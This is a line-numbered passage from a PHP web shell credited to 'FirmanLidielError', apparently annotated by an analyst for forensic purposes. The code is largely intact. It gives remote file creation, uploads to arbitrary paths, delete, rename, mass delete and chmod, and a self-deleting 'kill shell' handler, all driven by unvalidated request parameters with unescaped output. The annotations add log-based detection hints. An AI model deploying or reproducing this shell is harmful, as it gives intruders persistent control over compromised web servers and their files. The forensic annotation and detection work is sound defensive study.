  1558. if (isset($_POST['do_create_file'])) {
  1559.     $cfile = $_POST['create_file'];
  1560.     if (file_exists($cfile)) {
  1561.         success("file_exists", $cfile);
  1562.     } else {
  1563.         if (fopen($cfile, "w+")) {
  1564.             success("file_created", $cfile);
  1565.         } else {
  1566.             error("File was not created");
  1567.         }
  1568.     }
  1569. }
  1570. //Go directory
        // Analyst annotation (code unchanged): POST 'go_dir' is interpolated,
        // unescaped, into an inline script block that navigates the browser to
        // the same script with a path= query parameter. $domain and $script are
        // not defined in this chunk.
        // Detection: path= and editfile= query strings on an unexpected script name
        // are written to the access log even though the POST bodies are not.
  1571. if (isset($_POST['do_go_dir'])) {
  1572.     $godir = $_POST['go_dir'];
  1573.     echo "<script>window.location = 'http://$domain$script?path=$godir'</script>";
  1574. }
  1575. //Go Edit file
        // POST 'do_go_edit': if the path in POST 'go_edit_file' exists, a Location
        // header pointing at the editfile= view is sent; the request value is placed
        // in the header without encoding.
  1576. if (isset($_POST['do_go_edit'])) {
  1577.     $gefile = $_POST['go_edit_file'];
  1578.     if (file_exists($gefile)) {
  1579.         header("Location: http://$domain$script?editfile=$gefile");
  1580.     } else {
  1581.         error("File does not exist!");
  1582.     }
  1583. }
  1584. //Upload File
        // Analyst annotation (code unchanged): POST 'do_upload_file' moves the
        // uploaded file into the directory named by POST 'upload_location', keeping
        // the client-supplied file name. Neither value is validated, so the request
        // chooses both where the file lands and what it is called. Only upload
        // error code 0 has a branch; '@' suppresses move_uploaded_file() warnings.
        // success() and error() are defined outside this chunk.
  1585. if (isset($_POST['do_upload_file'])) {
  1586.     $udir = $_POST['upload_location'];
  1587.     $uname = $_FILES['upload_file']['name'];
  1588.     $both = "$udir$uname";
  1589.     if (file_exists($both)) {
  1590.         success("file_exists", $both);
  1591.     } else {
  1592.         switch ($_FILES['upload_file']['error']) {
  1593.             case 0:
  1594.                 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
  1595.                     success("file_uploaded");
  1596.                 } else {
  1597.                     error("Failed To Upload File!");
  1598.                 }
  1599.         }
  1600.     }
  1601. }
  1602. //Kill Shell
        // Analyst annotation (code unchanged): a GET parameter named 'kill' makes the
        // script unlink "$dir/$script2". Both variables are set outside this chunk;
        // presumably they name the shell's own file — confirm against the full file.
        // Forensics: the script being absent from disk does not rule out earlier
        // use; a request carrying kill in its query string stays in the access log.
  1603. if (isset($_GET['kill'])) {
  1604.     if (unlink("$dir/$script2")) {
  1605.         success("shell_killed");
  1606.     } else {
  1607.         error("Failed to kill shell!");
  1608.     }
  1609. }
  1610. //Delete Directory
        // GET 'deldir' is passed to rmdir() unchanged; on success the parent
        // directory (dirname) is handed to success(), which is defined elsewhere.
  1611. if (isset($_GET['deldir'])) {
  1612.     $deldir = $_GET['deldir'];
  1613.     $redir = dirname($deldir);
  1614.     if (rmdir($deldir)) {
  1615.         success("dir_del", rtrim($redir, '/'));
  1616.     } else {
  1617.         error("Failed to delete directory!");
  1618.     }
  1619. }
  1620. //Rename Directory
        // Analyst annotation (code unchanged): GET 'rendir' (parent path) and GET
        // 'old' (current name) select the entry; the form below echoes 'old' into an
        // HTML attribute without escaping. On POST 'do_rename_dir' the entry is
        // renamed to POST 'new_dir_name' inside the same parent. No value is
        // validated, and success()/error() are defined outside this chunk.
  1621. if (isset($_GET['rendir'])) {
  1622.     $rendir = $_GET['rendir'];
  1623.     $dend = $_GET['old'];
  1624.     echo "<center>
  1625. <form action='' method='post'>
  1626. <input type='text' class='text' name='new_dir_name' value='$dend'>
  1627. <input type='submit' name='do_rename_dir' value='Rename'>
  1628. </center>";
  1629. }
  1630. if (isset($_POST['do_rename_dir'])) {
  1631.     $newdir = $_POST['new_dir_name'];
  1632.     $rendir = $_GET['rendir'];
  1633.     $dend = $_GET['old'];
  1634.     if (rename("$rendir/$dend", "$rendir/$newdir")) {
  1635.         success("dir_renamed", $rendir);
  1636.     } else {
  1637.         error("Directory was not renamed!");
  1638.     }
  1639. }
  1640. //Delete file
        // GET 'delfile' is passed to unlink() unchanged.
        // Detection: delfile=, deldir=, rendir= and renfile= query strings on an
        // unexpected script name are visible in the web access log.
  1641. if (isset($_GET['delfile'])) {
  1642.     $delfile = $_GET['delfile'];
  1643.     $redir = dirname($delfile);
  1644.     if (unlink($delfile)) {
  1645.         success("filedelete", rtrim($redir, '/'));
  1646.     } else {
  1647.         error("Failed to delete file!");
  1648.     }
  1649. }
  1650. //Rename File
        // Same flow as the directory rename, driven by GET 'renfile' and 'old' and
        // POST 'new_file_name'; 'old' is again echoed unescaped into the form.
  1651. if (isset($_GET['renfile'])) {
  1652.     $renfile = $_GET['renfile'];
  1653.     $fend = $_GET['old'];
  1654.     echo "<center>
  1655. <form action='' method='post'>
  1656. <input type='text' class='text' name='new_file_name' value='$fend'>
  1657. <input type='submit' name='do_rename_file' value='Rename'>
  1658. </center>";
  1659. }
  1660. if (isset($_POST['do_rename_file'])) {
  1661.     $newfile = $_POST['new_file_name'];
  1662.     $renfile = $_GET['renfile'];
  1663.     $fend = $_GET['old'];
  1664.     if (rename("$renfile/$fend", "$renfile/$newfile")) {
  1665.         success("file_renamed", $renfile);
  1666.     } else {
  1667.         error("File was not renamed!");
  1668.     }
  1669. }
  1670. //Mass Files Stuff
        // Analyst annotation (code unchanged): POST 'mass_files' applies one action to
        // every path in POST 'delbox'. "Delete" calls rmdir() on directories and
        // unlink() on everything else; "chmod" calls chmod() with POST 'chmod_value'
        // passed through as received. Paths are echoed back without HTML escaping,
        // and no validation or access check is visible in this chunk.
        // Detection: bursts of deletions or permission changes made by the
        // web-server account in a short window (file-integrity monitoring, auditd).
  1671. if (isset($_POST['mass_files'])) {
  1672.     $action = $_POST['mass_action'];
  1673.     $chmodvalue = $_POST['chmod_value'];
  1674.     $box = $_POST['delbox'];
  1675.     if ($action == "Delete") {
  1676.         foreach ($box as $b) {
  1677.             if (is_dir($b)) {
  1678.                 if (rmdir($b)) {
  1679.                     echo "<font color='green'>Deleted Directory: $b</font><br>";
  1680.                 } else {
  1681.                     echo "<font color='red'>Failed To Delete Directory: $b</font><br>";
  1682.                 }
  1683.             } else {
  1684.                 if (unlink($b)) {
  1685.                     echo "<font color='green'>Deleted File: $b</font><br>";
  1686.                 } else {
  1687.                     echo "<font color='red'>Failed To Delete file: $b</font><br>";
  1688.                 }
  1689.             }
  1690.         }
  1691.     }
  1692.     if ($action == "chmod") {
  1693.         foreach ($box as $b) {
  1694.             if (is_dir($b)) {
  1695.                 if (chmod($b, $chmodvalue)) {
  1696.                     echo "<font color='green'>Changed Permissions Of Directory: $b</font><br>";
  1697.                 } else {
  1698.                     echo "<font color='red'>Failed To Change Permissions Of Directory: $b</font><br>";
  1699.                 }
  1700.             } else {
  1701.                 if (chmod($b, $chmodvalue)) {
  1702.                     echo "<font color='green'>Changed Persmissions Of File: $b</font><br>";
  1703.                 } else {
  1704.                     echo "<font color='red'>Failed To Change Permissions Of File: $b</font><br>";
  1705.                 }
  1706.             }
  1707.         }
  1708.     }
  1709. }
  1710. ?>
  1711. <footer>
  1712. <p>Copyright 2014 by: <a href="fb.com/Hacker.shtml">FirmanLidielError</a></p>
  1713. </footer>
  1714. </body>
  1715. </html>